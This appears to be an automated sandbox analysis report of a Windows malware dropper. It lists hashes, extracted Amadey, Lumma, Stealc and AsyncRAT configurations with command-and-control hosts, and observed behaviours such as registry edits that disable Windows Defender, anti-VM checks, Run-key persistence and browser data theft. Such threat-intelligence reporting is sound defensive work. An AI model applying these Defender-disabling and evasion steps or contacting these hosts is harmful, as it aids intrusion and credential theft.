Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 16:02
Static task
static1
Behavioral task
behavioral1
Sample
bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe
Resource
win10v2004-20241007-en
General
-
Target
bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe
-
Size
6.9MB
-
MD5
82c0cd73fed2e80d61b1e3dfe88a4532
-
SHA1
39430d223fa45488957ff0e8f72ed61347e0fb2e
-
SHA256
bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b
-
SHA512
2acac19997121bc1e5e9bc89357bd3d201c899d96294f55c79bb052c40ee8c6e19c61db9b9c991c5660ec995c3b8824ce581d8cf866c664d4c39a8c362608477
-
SSDEEP
196608:0RC0I/sAMruNuBukBz1RvEnglRcasdo4:0pI/FuHBz1RvEn6fsm4
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://atten-supporse.biz/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Asyncrat family
-
Gcleaner family
-
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 11f1d05df2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 11f1d05df2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 11f1d05df2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 11f1d05df2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 11f1d05df2.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/3488-187-0x00000000098B0000-0x00000000099D2000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4532 created 3188 4532 powershell.exe 96 -
Async RAT payload 3 IoCs
resource yara_rule behavioral1/memory/3488-97-0x0000000000760000-0x0000000000BC2000-memory.dmp family_asyncrat behavioral1/memory/3488-98-0x0000000000760000-0x0000000000BC2000-memory.dmp family_asyncrat behavioral1/memory/3488-252-0x0000000000760000-0x0000000000BC2000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1T36h5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b3011.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b0ca257f9b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11f1d05df2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 76a222939c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3S87A.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4I148J.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f8d272256d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b3011.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4I148J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4I148J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f8d272256d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11f1d05df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b3011.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3S87A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 76a222939c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3S87A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 76a222939c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1T36h5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b0ca257f9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b0ca257f9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f8d272256d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11f1d05df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1T36h5.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 1T36h5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H3tyh96.exe -
Executes dropped EXE 17 IoCs
pid Process 3356 F6W49.exe 1356 s0n62.exe 2604 1T36h5.exe 2944 skotes.exe 3020 2b3011.exe 1584 3S87A.exe 4540 4I148J.exe 2396 Z9Pp9pM.exe 2540 skotes.exe 3488 H3tyh96.exe 3952 b0ca257f9b.exe 3356 f8d272256d.exe 4636 d14992054b.exe 4828 11f1d05df2.exe 1612 76a222939c.exe 968 skotes.exe 4276 skotes.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 3S87A.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 4I148J.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine H3tyh96.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 11f1d05df2.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 76a222939c.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 1T36h5.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 2b3011.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine b0ca257f9b.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine f8d272256d.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4I148J.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 11f1d05df2.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f8d272256d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013746001\\f8d272256d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d14992054b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013747001\\d14992054b.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\11f1d05df2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013748001\\11f1d05df2.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" F6W49.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" s0n62.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b0ca257f9b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013745001\\b0ca257f9b.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 5000 powershell.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023cae-155.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 2604 1T36h5.exe 2944 skotes.exe 3020 2b3011.exe 1584 3S87A.exe 4540 4I148J.exe 2540 skotes.exe 3488 H3tyh96.exe 3952 b0ca257f9b.exe 3356 f8d272256d.exe 4828 11f1d05df2.exe 1612 76a222939c.exe 968 skotes.exe 4276 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1T36h5.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4136 sc.exe 5456 sc.exe 5828 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2384 3488 WerFault.exe 103 5800 1612 WerFault.exe 144 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f8d272256d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb94330d7bb4d60f1247bf1ab358ac2960823d8289d2016ea8e3489b6919038b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language d14992054b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3S87A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1T36h5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4I148J.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b0ca257f9b.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage d14992054b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76a222939c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language F6W49.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b3011.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s0n62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11f1d05df2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d14992054b.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 3204 taskkill.exe 1832 taskkill.exe 4588 taskkill.exe 4716 taskkill.exe 3740 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2604 1T36h5.exe 2604 1T36h5.exe 2944 skotes.exe 2944 skotes.exe 3020 2b3011.exe 3020 2b3011.exe 1584 3S87A.exe 1584 3S87A.exe 4540 4I148J.exe 4540 4I148J.exe 2540 skotes.exe 2540 skotes.exe 4540 4I148J.exe 4540 4I148J.exe 3488 H3tyh96.exe 3488 H3tyh96.exe 3488 H3tyh96.exe 3488 H3tyh96.exe 3952 b0ca257f9b.exe 3952 b0ca257f9b.exe 3488 H3tyh96.exe 3356 f8d272256d.exe 3356 f8d272256d.exe 4532 powershell.exe 4532 powershell.exe 4636 d14992054b.exe 4636 d14992054b.exe 4828 11f1d05df2.exe 4828 11f1d05df2.exe 4532 powershell.exe 5000 powershell.exe 4828 11f1d05df2.exe 4828 11f1d05df2.exe 4828 11f1d05df2.exe 5000 powershell.exe 5000 powershell.exe 4636 d14992054b.exe 4636 d14992054b.exe 1612 76a222939c.exe 1612 76a222939c.exe 5000 powershell.exe 968 skotes.exe 968 skotes.exe 4276 skotes.exe 4276 skotes.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
description pid Process Token: SeDebugPrivilege 4540 4I148J.exe Token: SeDebugPrivilege 3488 H3tyh96.exe Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 4716 taskkill.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 1584 whoami.exe Token: SeDebugPrivilege 3740 taskkill.exe Token: SeDebugPrivilege 5000 powershell.exe Token: SeDebugPrivilege 4828 11f1d05df2.exe Token: SeDebugPrivilege 3804 firefox.exe Token: SeDebugPrivilege 3804 firefox.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe Token: SeDebugPrivilege 5792 whoami.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 2604 1T36h5.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 3804 firefox.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe 4636 d14992054b.exe -
Suspicious use of SendNotifyMessage 34 IoCs
